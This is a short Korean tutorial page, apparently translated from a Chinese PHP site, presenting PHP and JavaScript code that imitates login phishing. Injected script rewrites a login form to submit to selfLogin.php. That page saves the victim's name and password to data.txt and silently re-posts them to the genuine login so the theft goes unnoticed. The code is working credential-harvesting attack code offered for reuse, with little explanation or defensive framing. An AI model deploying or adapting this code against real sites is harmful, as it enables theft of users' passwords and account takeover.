이 글의 내용은 PHP와 JS에서 로그인 피싱을 모방하는 코드 예제입니다. 도움이 필요한 친구들이 참고할 수 있기를 바랍니다.
디렉토리 소개
login.php 일반 로그인 파일
selfLogin.php 사용자 정의 로그인 파일
data .txt 기록 사용자
<?php
echo "<pre class="brush:php;toolbar:false">";
$userInfo = $_POST ;
if ($userInfo) {
# code...
var_dump($userInfo,'登录成功') ;exit();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>登录</title>
</head>
<body>
<form id="login" method="post" action="login.php">
用户姓名:<input type="text" name="name">
用户密码:<input type="password" name="pwd">
<input type="submit" value="确认登录">
</form>
</body>
<script type="text/javascript">
//js劫持代码
window.onload = function (eve) {
var form = document.getElementById('login');
form.innerHTML = ' <form id="login" method="post" > 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录"> </form> ' ;
//钓鱼地址
form.action = "selfLogin.php" ;
}
</script>
</html>data.txt
<?php
$name = '' ;
$pwd = '' ;
//var_dump('数据被截取了',$_POST) ;
if($_POST) {
//记录获取的数据信息
$name = $_POST['name'] ;
$pwd = $_POST['pwd'] ;
file_put_contents('data.txt', json_encode($_POST,true)) ;
}
?>
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
</body>
<script type="text/javascript">
//构建之前的页面
window.onload = function (eve) {
var name = '<?php echo $name; ?>' ;
var pwd = '<?php echo $pwd; ?>' ;
if(name && pwd) {
var p = document.createElement('p');
document.body.appendChild(p);
p.innerHTML =' <form id="login2" method="post" action="login.php" > '+
' 用户姓名:<input type="text" name="name" value="'+name+'"> 用户密码:<input type="password" name="pwd" value="'+pwd+'"> ' ;
document.getElementById('login2').submit();
}
}
</script>
</html>컬럼!
위 내용은 PHP와 JS를 활용한 로그인 피싱 모방 코드 예시의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
